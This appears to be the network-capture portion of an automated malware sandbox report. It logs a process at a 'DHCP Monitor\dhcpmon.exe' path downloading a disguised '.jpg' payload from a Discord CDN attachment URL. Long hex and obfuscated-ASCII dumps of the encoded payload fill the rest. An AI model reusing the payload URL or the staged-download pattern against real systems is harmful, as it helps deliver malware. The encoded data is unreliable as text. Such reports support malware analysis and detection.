6a 20 65 6a 78 20 71 63
                Data Ascii: xp qpI ejI qxO qIw ejI qxO qwI ejI qxp qpw ejI qxO qxe ejI qxO qxI ejI qxp qpw ejI qxO qIw h ejx qch qjq ejx qch qcj ejx qxO qpj ejx qxO qph ejx qch qIj ejx qxO qph ejx qch qjq ejx qch qII ejx qch qIx ejx qch qxO ejx qxO qwO ejx qch qII ejx qxO qpj ejx qc
                2021-10-27 01:03:08 UTC898INData Raw: 20 71 49 70 20 65 65 49 20 71 4f 68 20 71 77 68 20 65 65 49 20 71 4f 71 20 71 6a 71 20 65 65 49 20 71 4f 71 20 71 49 71 20 65 65 49 20 71 4f 68 20 71 77 68 20 65 65 49 20 71 4f 68 20 71 70 70 20 65 65 49 20 71 4f 71 20 71 63 6a 20 65 65 49 20 71 4f 68 20 71 77 78 20 68 20 65 65 49 20 71 4f 71 20 71 63 63 20 65 65 49 20 71 4f 71 20 71 6a 63 20 65 65 49 20 71 4f 68 20 71 70 70 20 65 65 49 20 71 4f 68 20 71 70 6a 20 65 65 49 20 71 4f 71 20 71 6a 4f 20 65 65 49 20 71 4f 71 20 71 49 4f 20 65 65 49 20 71 4f 68 20 71 70 49 20 65 65 49 20 71 4f 68 20 71 70 6a 20 65 65 49 20 71 4f 68 20 71 70 77 20 65 65 49 20 71 4f 71 20 71 77 63 20 65 65 49 20 71 4f 68 20 71 4f 68 20 65 65 49 20 71 4f 68 20 71 70 70 20 65 65 49 20 71 4f 68 20 71 70 6a 20 65 65 49 20 71 4f 68 20
                Data Ascii: qIp eeI qOh qwh eeI qOq qjq eeI qOq qIq eeI qOh qwh eeI qOh qpp eeI qOq qcj eeI qOh qwx h eeI qOq qcc eeI qOq qjc eeI qOh qpp eeI qOh qpj eeI qOq qjO eeI qOq qIO eeI qOh qpI eeI qOh qpj eeI qOh qpw eeI qOq qwc eeI qOh qOh eeI qOh qpp eeI qOh qpj eeI qOh
                2021-10-27 01:03:08 UTC914INData Raw: 78 78 20 65 6a 6a 20 71 6a 63 20 71 78 65 20 65 6a 6a 20 71 6a 78 20 71 63 4f 20 65 6a 6a 20 71 6a 78 20 71 77 77 20 65 6a 6a 20 71 6a 78 20 71 77 78 20 65 6a 6a 20 71 6a 63 20 71 78 49 20 65 6a 6a 20 71 6a 78 20 71 49 68 20 65 6a 6a 20 71 6a 78 20 71 49 6a 20 65 6a 6a 20 71 6a 78 20 71 49 65 20 65 6a 6a 20 71 6a 78 20 71 49 6a 20 65 6a 6a 20 71 6a 78 20 71 63 70 20 65 6a 6a 20 71 6a 78 20 71 77 63 20 65 6a 6a 20 71 6a 78 20 71 70 65 20 68 20 65 6a 65 20 71 6a 70 20 71 77 70 20 65 6a 65 20 71 6a 70 20 71 70 6a 20 65 6a 65 20 71 6a 70 20 71 70 78 20 65 6a 65 20 71 6a 70 20 71 77 4f 20 65 6a 65 20 71 6a 4f 20 71 49 49 20 65 6a 65 20 71 6a 4f 20 71 49 4f 20 65 6a 65 20 71 6a 4f 20 71 49 78 20 65 6a 65 20 71 6a 4f 20 71 49 63 20 65 6a 65 20 71 6a 70 20 71 77
                Data Ascii: xx ejj qjc qxe ejj qjx qcO ejj qjx qww ejj qjx qwx ejj qjc qxI ejj qjx qIh ejj qjx qIj ejj qjx qIe ejj qjx qIj ejj qjx qcp ejj qjx qwc ejj qjx qpe h eje qjp qwp eje qjp qpj eje qjp qpx eje qjp qwO eje qjO qII eje qjO qIO eje qjO qIx eje qjO qIc eje qjp qw
                2021-10-27 01:03:08 UTC930INData Raw: 20 65 65 77 20 71 49 63 20 71 77 68 20 65 65 77 20 71 49 63 20 71 49 4f 20 65 65 77 20 71 49 63 20 71 77 65 20 65 65 77 20 71 49 63 20 71 70 63 20 65 65 77 20 71 49 63 20 71 77 63 20 65 65 77 20 71 49 63 20 71 70 77 20 65 65 77 20 71 49 63 20 71 77 65 20 65 65 77 20 71 49 78 20 71 4f 71 20 65 65 77 20 71 49 78 20 71 70 4f 20 65 65 77 20 71 49 63 20 71 49 4f 20 65 65 77 20 71 49 63 20 71 78 71 20 65 65 77 20 71 49 78 20 71 70 4f 20 68 20 65 65 78 20 71 77 71 20 71 70 70 20 65 65 78 20 71 77 68 20 71 70 71 20 65 65 78 20 71 77 71 20 71 70 71 20 65 65 78 20 71 77 71 20 71 70 4f 20 65 65 78 20 71 77 71 20 71 77 71 20 65 65 78 20 71 77 71 20 71 49 4f 20 65 65 78 20 71 77 71 20 71 49 70 20 65 65 78 20 71 77 71 20 71 49 77 20 65 65 78 20 71 77 71 20 71 49 77 20
                Data Ascii: eew qIc qwh eew qIc qIO eew qIc qwe eew qIc qpc eew qIc qwc eew qIc qpw eew qIc qwe eew qIx qOq eew qIx qpO eew qIc qIO eew qIc qxq eew qIx qpO h eex qwq qpp eex qwh qpq eex qwq qpq eex qwq qpO eex qwq qwq eex qwq qIO eex qwq qIp eex qwq qIw eex qwq qIw
                2021-10-27 01:03:08 UTC946INData Raw: 71 71 68 20 71 71 63 20 71 71 49 20 4f 77 20 71 71 68 20 4f 4f 20 71 68 71 20 4f 63 20 4f 63 20 68 20 68 20 68 20 78 20 6a 65 20 71 20 71 20 65 20 63 20 71 20 68 20 68 20 68 20 68 20 49 20 6a 65 20 71 20 71 20 71 77 20 71 65 70 20 71 6a 77 20 70 20 71 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 71 65 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 70 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 71 77 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 65 68 20 78 20 77 20 71 20 71 70 20 71 65 20 78 20 77 20 71 20 71 70 20 70 20 78 20 77 20 71 20 71 70 20 71 77 20 78 20 77 20 71 20 71 70 20 65 68 20 6a 20 77 20 71 20 65 20 78 20 68 20 71 20 65 70 20 65 70 20 6a 20 77 20 71 20 70 20 78 20 77 20 71 20
                Data Ascii: qqh qqc qqI Ow qqh OO qhq Oc Oc h h h x je q q e c q h h h h I je q q qw qep qjw p q h h h h h h h I eq qp ex q qp qe I eq qp ex q qp p I eq qp ex q qp qw I eq qp ex q qp eh x w q qp qe x w q qp p x w q qp qw x w q qp eh j w q e x h q ep ep j w q p x w q


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.349718162.159.134.233443C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                TimestampkBytes transferredDirectionData
                2021-10-27 01:03:26 UTC955OUTGET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1
                Host: cdn.discordapp.com
                Connection: Keep-Alive
                2021-10-27 01:03:26 UTC955INHTTP/1.1 200 OK
                Date: Wed, 27 Oct 2021 01:03:26 GMT
                Content-Type: image/jpeg
                Content-Length: 976828
                Connection: close
                CF-Ray: 6a48012d5fc64327-FRA
                Accept-Ranges: bytes
                Age: 18
                Cache-Control: public, max-age=31536000
                ETag: "be30f5911bc96f37b49a11905d15afac"
                Expires: Thu, 27 Oct 2022 01:03:26 GMT
                Last-Modified: Tue, 26 Oct 2021 20:23:59 GMT
                Vary: Accept-Encoding
                CF-Cache-Status: HIT
                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                Cf-Bgj: h2pri
                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                x-goog-generation: 1635279839570116
                x-goog-hash: crc32c=xGchCA==
                x-goog-hash: md5=vjD1kRvJbze0mhGQXRWvrA==
                x-goog-metageneration: 1
                x-goog-storage-class: STANDARD
                x-goog-stored-content-encoding: identity
                x-goog-stored-content-length: 976828
                X-GUploader-UploadID: ADPycduDNcNKudAcRz6osKTk_KjWwpIcT_kNR8UJ2V--3Z8m0poOiEMI9P_muZLQC_1wabNpP26rayGI7bwnkyAWlSI
                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g4YrdIoXpqMeU8f7yjB9jatNF30Z%2F8gmin5TUw182RCT%2FFCj3jQxhIIvHplI6LqrcmHjguXqTvjTVPQMRWlXlkRht%2BoOIHshH7jUOdFSniHyhdsDidaLiLzbMeYp0pUK%2Bp8b9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                2021-10-27 01:03:26 UTC956INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                2021-10-27 01:03:26 UTC956INData Raw: 68 71 65 6a 78 63 49 77 70 4f 2d 77 77 20 4f 68 20 71 78 78 20 68 20 6a 20 68 20 68 20 68 20 78 20 68 20 68 20 68 20 65 63 63 20 65 63 63 20 68 20 68 20 71 70 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 49 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 71 65 70 20 68 20 68 20 68 20 71 78 20 6a 71 20 71 70 49 20 71 78 20 68 20 71 70 68 20 4f 20 65 68 63 20 6a 6a 20 71 70 78 20 71 20 77 49 20 65 68 63 20 6a 6a 20 70 78 20 71 68 78 20 71 68 63 20 71 71 63 20 6a 65 20 71 71 65 20 71 71 78 20 71 71 71 20 71 68 6a 20 71 71 78 20 4f 77 20 71 68 4f 20 6a 65 20 4f 4f 20 4f 77 20 71 71 68 20 71
                Data Ascii: hqejxcIwpO-ww Oh qxx h j h h h x h h h ecc ecc h h qpx h h h h h h h Ix h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h qep h h h qx jq qpI qx h qph O ehc jj qpx q wI ehc jj px qhx qhc qqc je qqe qqx qqq qhj qqx Ow qhO je OO Ow qqh q
                2021-10-27 01:03:26 UTC958INData Raw: 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 65 63 20 78 68 20 65 65 4f 20 71 68 4f 20 71 71 63 20 63 68 20 78 70 20 63 68 20 63 68 20 70 78 20 71 71 78 20 71 71 77 20 71 78 49 20 71 78 6a 20 63 68 20 78 70 20 71 6a 70 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 71 65 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70
                Data Ascii: h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h ec xh eeO qhO qqc ch xp ch ch px qqx qqw qxI qxj ch xp qjp cx px qqx qqw qhO qqe ch qqe ch cx px qqx qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp ch cx p
                2021-10-27 01:03:26 UTC959INData Raw: 65 78 63 20 63 63 20 70 78 20 71 71 78 20 70 63 20 71 68 4f 20 71 71 65 20 63 68 20 65 78 70 20 63 71 20 63 78 20 70 78 20 71 71 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 71 70 20 63 78 20 70 78 20 71 70 20 4f 71 20 6a 71 20 65 71 20 4f 78 20 4f 63 20 70 71 20 63 78 20 70 78 20 71 65 49 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 70 20 63 78 20 70 78 20 71 71 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 65 78 70 20 78 4f 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 63 6a 20 71 68 4f 20 71 71 65 20 71 71 65 20 6a 68 20 49 78 20 49 4f 20 6a 70 20
                Data Ascii: exc cc px qqx pc qhO qqe ch exp cq cx px qqe qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp qp cx px qp Oq jq eq Ox Oc pq cx px qeI qqw qhO qqe ch xp xp cx px qqe qqw qhO qqe exp xO ch cx px qqx qqw qhO qqe ch xp ch cx px qqx cj qhO qqe qqe jh Ix IO jp
                2021-10-27 01:03:26 UTC960INData Raw: 71 71 49 20 71 68 4f 20 71 71 65 20 63 78 20 4f 63 20 71 78 20 63 78 20 70 78 20 71 65 68 20 4f 63 20 71 68 4f 20 4f 4f 20 65 20 78 4f 20 63 68 20 49 71 20 70 78 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 63 68 20 6a 6a 20 77 49 20 63 65 20 70 78 20 71 71 78 20 71 71 6a 20 65 20 77 77 20 63 68 20 78 70 20 63 49 20 65 70 20 70 78 20 4f 77 20 49 4f 20 71 68 70 20 71 71 65 20 63 77 20 78 70 20 63 68 20 63 78 20 70 68 20 71 71 78 20 71 71 77 20 71 65 78 20 71 78 20 78 4f 20 78 70 20 63 68 20 63 68 20 63 4f 20 77 49 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 78 20 78 70 20 6a 6a 20 49 20 70 63 20 71 71 78 20 71 65 49 20 71 68 4f 20 71 71 65 20 63 68 20 63 6a 20 63 68 20 63 78 20 49 4f 20 71 65 20 71 71 6a 20 71 68 4f 20 71 71 65 20 63 78 20 4f 63 20 71
                Data Ascii: qqI qhO qqe cx Oc qx cx px qeh Oc qhO OO e xO ch Iq px qqx qqw qqh qqe ch jj wI ce px qqx qqj e ww ch xp cI ep px Ow IO qhp qqe cw xp ch cx ph qqx qqw qex qx xO xp ch ch cO wI qqw qhO qee ex xp jj I pc qqx qeI qhO qqe ch cj ch cx IO qe qqj qhO qqe cx Oc q
                2021-10-27 01:03:26 UTC962INData Raw: 20 6a 68 20 71 77 71 20 71 71 78 20 71 71 77 20 71 68 77 20 71 68 65 20 71 4f 71 20 71 63 63 20 63 68 20 63 78 20 70 63 20 4f 68 20 49 71 20 71 68 4f 20 71 71 65 20 63 49 20 49 77 20 71 65 6a 20 63 78 20 70 78 20 71 65 68 20 71 63 20 6a 68 20 63 70 20 63 68 20 78 70 20 63 49 20 6a 63 20 71 65 71 20 71 71 6a 20 70 6a 20 77 68 20 71 71 4f 20 71 77 70 20 63 49 20 63 68 20 63 78 20 70 68 20 70 4f 20 71 71 77 20 71 4f 20 71 65 68 20 63 68 20 78 70 20 63 78 20 65 6a 68 20 4f 65 20 71 71 78 20 71 71 77 20 71 71 70 20 70 70 20 71 71 49 20 78 70 20 63 68 20 49 68 20 49 78 20 65 4f 20 49 65 20 71 68 4f 20 71 71 65 20 63 49 20 65 78 20 63 78 20 63 78 20 70 78 20 70 4f 20 71 71 68 20 49 78 20 71 71 70 20 65 68 20 65 6a 77 20 77 70 20 63 78 20 70 78 20 71 71 78 20 71
                Data Ascii: jh qwq qqx qqw qhw qhe qOq qcc ch cx pc Oh Iq qhO qqe cI Iw qej cx px qeh qc jh cp ch xp cI jc qeq qqj pj wh qqO qwp cI ch cx ph pO qqw qO qeh ch xp cx ejh Oe qqx qqw qqp pp qqI xp ch Ih Ix eO Ie qhO qqe cI ex cx cx px pO qqh Ix qqp eh ejw wp cx px qqx q
                2021-10-27 01:03:26 UTC963INData Raw: 78 20 77 63 20 70 70 20 71 68 6a 20 78 70 20 63 68 20 49 68 20 71 65 49 20 70 78 20 4f 78 20 71 63 78 20 71 71 65 20 78 4f 20 68 20 63 49 20 63 78 20 4f 71 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 65 20 77 70 20 71 68 71 20 70 70 20 71 68 49 20 70 49 20 65 49 20 71 71 6a 20 63 68 20 63 78 20 4f 78 20 70 70 20 70 6a 20 77 68 20 71 6a 63 20 63 68 20 6a 63 20 65 20 63 68 20 70 78 20 71 71 71 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 77 20 78 70 20 63 68 20 6a 4f 20 70 49 20 71 68 6a 20 4f 70 20 49 78 20 4f 70 20 65 68 20 63 71 20 6a 4f 20 78 6a 20 71 65 71 20 71 65 63 20 70 6a 20 49 4f 20 6a 78 20 63 68 20 78 70 20 63 49 20 6a 68 20 77 20 71 71 78 20 71 71 77 20 71 68 6a 20 4f 68 20 65 68 20 65 77 20 65 65 65 20 71 49
                Data Ascii: x wc pp qhj xp ch Ih qeI px Ox qcx qqe xO h cI cx Oq qqx qqw qhO qqe ch xp ch ce wp qhq pp qhI pI eI qqj ch cx Ox pp pj wh qjc ch jc e ch px qqq qqw qhO qqe cw xp ch jO pI qhj Op Ix Op eh cq jO xj qeq qec pj IO jx ch xp cI jh w qqx qqw qhj Oh eh ew eee qI
                2021-10-27 01:03:26 UTC964INData Raw: 63 4f 20 6a 77 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 49 20 6a 77 20 63 71 20 63 78 20 70 65 20 71 71 65 20 4f 4f 20 65 78 77 20 78 20 63 49 20 78 70 20 63 68 20 78 63 20 77 78 20 4f 63 20 71 65 77 20 77 63 20 71 78 20 63 20 78 70 20 63 68 20 63 68 20 71 65 68 20 4f 49 20 4f 78 20 71 71 68 20 71 65 65 20 65 63 20 71 4f 49 20 77 49 20 68 20 70 78 20 71 71 78 20 71 71 6a 20 71 68 77 20 70 70 20 71 68 78 20 78 4f 20 63 68 20 78 70 20 71 65 71 20 71 71 70 20 4f 70 20 71 68 65 20 4f 71 20 78 70 20 6a 70 20 63 77 20 78 4f 20 71 65 78 20 71 68 4f 20 71 71 77 20 71 68 4f 20 71 71 70 20 65 78 20 6a 63 20 65 20 63 6a 20 70 78 20 49 71 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 78 20 78 70 20 63 68 20 6a 4f 20 70 49 20 71 68 68 20 65 6a 4f 20 65 68 20 49 49 20 63
                Data Ascii: cO jw qqw qhO qee eI jw cq cx pe qqe OO exw x cI xp ch xc wx Oc qew wc qx c xp ch ch qeh OI Ox qqh qee ec qOI wI h px qqx qqj qhw pp qhx xO ch xp qeq qqp Op qhe Oq xp jp cw xO qex qhO qqw qhO qqp ex jc e cj px Iq qqw qhO qqe jx xp ch jO pI qhh ejO eh II c
                2021-10-27 01:03:26 UTC966INData Raw: 77 49 20 71 68 20 63 68 20 63 78 20 70 68 20 65 4f 20 78 6a 20 71 68 4f 20 71 71 65 20 63 49 20 6a 63 20 63 77 20 71 78 20 71 4f 70 20 71 71 78 20 71 71 77 20 71 68 4f 20 4f 70 20 63 77 20 65 78 20 71 68 4f 20 63 78 20 70 78 20 71 65 68 20 71 68 65 20 71 68 49 20 71 71 70 20 6a 63 20 63 63 20 77 6a 20 6a 4f 20 70 78 20 71 71 78 20 71 71 6a 20 65 20 71 49 20 63 68 20 78 70 20 63 49 20 65 49 20 70 71 20 77 78 20 68 20 71 68 4f 20 71 71 65 20 63 68 20 6a 4f 20 71 77 70 20 49 6a 20 70 78 20 71 71 78 20 71 71 6a 20 77 77 20 65 68 70 20 65 63 20 65 65 78 20 78 78 20 6a 68 20 71 77 71 20 71 71 78 20 71 71 77 20 71 68 77 20 4f 77 20 63 6a 20 77 63 20 6a 63 20 63 78 20 70 78 20 71 71 70 20 65 78 4f 20 6a 77 20 71 71 65 20 63 68 20 78 4f 20 65 49 20 71 68 49 20 70
                Data Ascii: wI qh ch cx ph eO xj qhO qqe cI jc cw qx qOp qqx qqw qhO Op cw ex qhO cx px qeh qhe qhI qqp jc cc wj jO px qqx qqj e qI ch xp cI eI pq wx h qhO qqe ch jO qwp Ij px qqx qqj ww ehp ec eex xx jh qwq qqx qqw qhw Ow cj wc jc cx px qqp exO jw qqe ch xO eI qhI p
                2021-10-27 01:03:26 UTC967INData Raw: 20 63 77 20 65 77 20 71 4f 63 20 49 4f 20 71 65 68 20 71 71 78 20 71 71 77 20 71 68 77 20 71 65 78 20 63 70 20 63 68 20 63 6a 20 71 77 65 20 78 63 20 63 70 20 71 71 77 20 71 68 4f 20 71 71 6a 20 49 77 20 71 65 68 20 63 68 20 63 78 20 70 63 20 71 63 20 71 68 68 20 71 68 4f 20 71 71 65 20 63 78 20 63 49 20 78 70 20 78 4f 20 49 77 20 78 65 20 65 6a 4f 20 65 68 20 49 49 20 63 68 20 78 70 20 63 71 20 77 71 20 71 68 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 6a 20 49 71 20 78 70 20 63 68 20 63 68 20 4f 65 20 71 71 65 20 71 71 78 20 71 71 77 20 78 68 20 71 49 70 20 49 70 20 71 63 6a 20 63 78 20 70 78 20 71 71 63 20 70 20 71 65 63 20 71 71 65 20 63 68 20 63 65 20 63 70 20 63 65 20 70 6a 20 71 68 77 20 78 63 20 65 78 77 20 4f 20 71 70 20 78 70 20 63 68 20 63 63
                Data Ascii: cw ew qOc IO qeh qqx qqw qhw qex cp ch cj qwe xc cp qqw qhO qqj Iw qeh ch cx pc qc qhh qhO qqe cx cI xp xO Iw xe ejO eh II ch xp cq wq qhe qqx qqw qhp qj Iq xp ch ch Oe qqe qqx qqw xh qIp Ip qcj cx px qqc p qec qqe ch ce cp ce pj qhw xc exw O qp xp ch cc
                2021-10-27 01:03:26 UTC968INData Raw: 4f 20 71 68 68 20 71 71 65 20 65 63 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 78 20 78 4f 20 78 78 20 6a 71 20 6a 4f 20 71 71 78 20 70 78 20 71 71 4f 20 71 68 63 20 71 68 6a 20 6a 71 20 6a 6a 20 65 68 20 71 49 20 70 49 20 71 71 4f 20 4f 70 20 49 78 20 4f 77 20 65 68 20 65 65 20 65 78 20 77 63 20 4f 63 20 71 71 78 20 71 71 77 20 71 68 63 20 4f 71 20 65 71 49 20 77 77 20 49 65 20 63 78 20 70 78 20 71 71 70 20 4f 78 20 71 6a 63 20 71 6a 20 49 6a 20 78 70 20 63 68 20 63 68 20 71 65 77 20 71 63 65 20 71 71 77 20 71 65 49 20 49 78 20 63 65 20 78 70 20 71 70 71 20 63 78 20 70 78 20 71 71 78 20 4f 77 20 71 68 4f 20 71 71 65 20 6a 63 20 63 68 20 6a 77 20 71 49 77 20 49 49 20 4f 78 20 4f 78 20 77 63 20 71 71 63 20 71 70 70 20
                Data Ascii: O qhh qqe ec xp ch cx px qqx qqw qhO qqx xO xx jq jO qqx px qqO qhc qhj jq jj eh qI pI qqO Op Ix Ow eh ee ex wc Oc qqx qqw qhc Oq eqI ww Ie cx px qqp Ox qjc qj Ij xp ch ch qew qce qqw qeI Ix ce xp qpq cx px qqx Ow qhO qqe jc ch jw qIw II Ox Ox wc qqc qpp
                2021-10-27 01:03:26 UTC970INData Raw: 68 65 20 6a 4f 20 65 4f 20 6a 65 20 71 49 20 78 77 20 71 68 49 20 71 71 77 20 71 68 4f 20 71 71 49 20 78 4f 20 78 63 20 6a 49 20 65 49 20 4f 78 20 70 78 20 65 49 20 63 20 71 71 65 20 63 68 20 63 70 20 65 78 20 71 49 20 71 65 77 20 71 63 70 20 70 6a 20 77 68 20 71 6a 65 20 78 4f 20 68 20 63 49 20 63 78 20 71 68 68 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 65 20 77 49 20 71 68 78 20 70 70 20 71 68 6a 20 70 49 20 77 6a 20 78 68 20 63 68 20 63 78 20 70 68 20 4f 63 20 71 71 63 20 77 68 20 71 71 63 20 65 68 20 65 77 20 71 4f 70 20 65 70 20 70 49 20 71 71 71 20 71 68 63 20 49 78 20 4f 70 20 65 68 20 77 63 20 78 65 20 63 78 20 70 78 20 71 71 70 20 71 71 70 20 71 65 68 20 71 68 49 20 6a 71 20 63 70 20 65 68 20 70 4f 20 49 71
                Data Ascii: he jO eO je qI xw qhI qqw qhO qqI xO xc jI eI Ox px eI c qqe ch cp ex qI qew qcp pj wh qje xO h cI cx qhh qqx qqw qhO qqe ch xp ch ce wI qhx pp qhj pI wj xh ch cx ph Oc qqc wh qqc eh ew qOp ep pI qqq qhc Ix Op eh wc xe cx px qqp qqp qeh qhI jq cp eh pO Iq
                2021-10-27 01:03:26 UTC971INData Raw: 71 63 6a 20 4f 68 20 78 70 20 78 65 20 6a 77 20 65 77 20 77 71 20 70 78 20 71 78 20 71 71 49 20 71 71 65 20 63 68 20 63 65 20 78 4f 20 78 68 20 77 77 20 4f 63 20 71 65 49 20 77 63 20 71 71 49 20 4f 6a 20 4f 63 20 63 68 20 63 78 20 4f 78 20 70 70 20 70 6a 20 77 68 20 71 63 63 20 65 68 20 65 77 20 71 4f 6a 20 63 78 20 70 78 20 71 71 78 20 71 71 70 20 4f 6a 20 71 65 65 20 63 68 20 65 6a 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 70 20 78 6a 20 78 6a 20 65 77 20 4f 78 20 70 78 20 71 78 20 71 71 4f 20 71 71 65 20 63 68 20 63 65 20 6a 71 20 78 70 20 71 65 77 20 71 71 6a 20 70 6a 20 77 68 20 71 6a 65 20 65 78 20 63 68 20 78 65 20 78 65 20 71 65 71 20 71 65 49 20 70 6a 20 65 65 20 71 68 49 20 63 68 20 78 70 20 63 78 20 70 4f
                Data Ascii: qcj Oh xp xe jw ew wq px qx qqI qqe ch ce xO xh ww Oc qeI wc qqI Oj Oc ch cx Ox pp pj wh qcc eh ew qOj cx px qqx qqp Oj qee ch ej ch cx px qqx qqw qhO qqe xp xj xj ew Ox px qx qqO qqe ch ce jq xp qew qqj pj wh qje ex ch xe xe qeq qeI pj ee qhI ch xp cx pO
                2021-10-27 01:03:26 UTC972INData Raw: 77 20 71 68 77 20 71 71 49 20 6a 49 20 78 65 20 78 70 20 77 77 20 77 4f 20 71 71 78 20 71 71 77 20 71 68 63 20 71 71 20 6a 49 20 78 70 20 63 68 20 63 68 20 70 71 20 4f 68 20 71 4f 78 20 71 68 4f 20 71 71 65 20 63 65 20 65 49 20 63 68 20 63 78 20 70 78 20 71 71 6a 20 49 4f 20 71 68 6a 20 71 71 65 20 49 71 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 63 20 78 49 20 78 6a 20 6a 71 20 78 4f 20 71 71 78 20 4f 68 20 65 6a 63 20 71 68 4f 20 71 71 65 20 63 65 20 65 49 20 65 68 20 65 4f 20 71 49 6a 20 71 71 78 20 71 71 71 20 49 4f 20 65 6a 77 20 63 68 20 78 70 20 63 65 20 65 70 20 70 78 20 4f 77 20 49 4f 20 71 68 63 20 71 71 65 20 71 49 4f 20 78 70 20 63 68 20 63 78 20 77 49 20 71 71 78 20 71 71 77 20 71 65 78 20 71 68 63 20 71
                Data Ascii: w qhw qqI jI xe xp ww wO qqx qqw qhc qq jI xp ch ch pq Oh qOx qhO qqe ce eI ch cx px qqj IO qhj qqe Iq xp ch cx px qqx qqw qhO qqc xI xj jq xO qqx Oh ejc qhO qqe ce eI eh eO qIj qqx qqq IO ejw ch xp ce ep px Ow IO qhc qqe qIO xp ch cx wI qqx qqw qex qhc q
                2021-10-27 01:03:26 UTC974INData Raw: 65 6a 70 20 78 49 20 63 70 20 71 65 77 20 71 70 4f 20 71 65 68 20 77 68 20 71 49 49 20 77 4f 20 71 70 78 20 63 68 20 63 78 20 70 68 20 70 4f 20 71 49 4f 20 49 4f 20 49 68 20 63 68 20 78 70 20 63 49 20 6a 4f 20 70 68 20 71 65 71 20 4f 6a 20 71 65 20 71 71 65 20 63 68 20 63 70 20 65 6a 49 20 63 78 20 70 6a 20 70 70 20 71 68 4f 20 71 70 4f 20 71 71 6a 20 6a 78 20 78 70 20 63 68 20 63 78 20 70 78 20 71 65 65 20 71 71 77 20 78 68 20 49 71 20 63 68 20 49 6a 20 71 71 49 20 63 78 20 70 78 20 71 71 63 20 71 68 65 20 4f 6a 20 71 71 49 20 63 68 20 4f 49 20 63 68 20 63 78 20 70 78 20 71 68 63 20 71 71 77 20 71 68 4f 20 4f 77 20 78 70 20 49 77 20 77 65 20 63 78 20 70 78 20 71 65 68 20 71 71 68 20 49 78 20 71 65 6a 20 65 68 20 63 63 20 4f 6a 20 77 63 20 70 78 20 71 71
                Data Ascii: ejp xI cp qew qpO qeh wh qII wO qpx ch cx ph pO qIO IO Ih ch xp cI jO ph qeq Oj qe qqe ch cp ejI cx pj pp qhO qpO qqj jx xp ch cx px qee qqw xh Iq ch Ij qqI cx px qqc qhe Oj qqI ch OI ch cx px qhc qqw qhO Ow xp Iw we cx px qeh qqh Ix qej eh cc Oj wc px qq
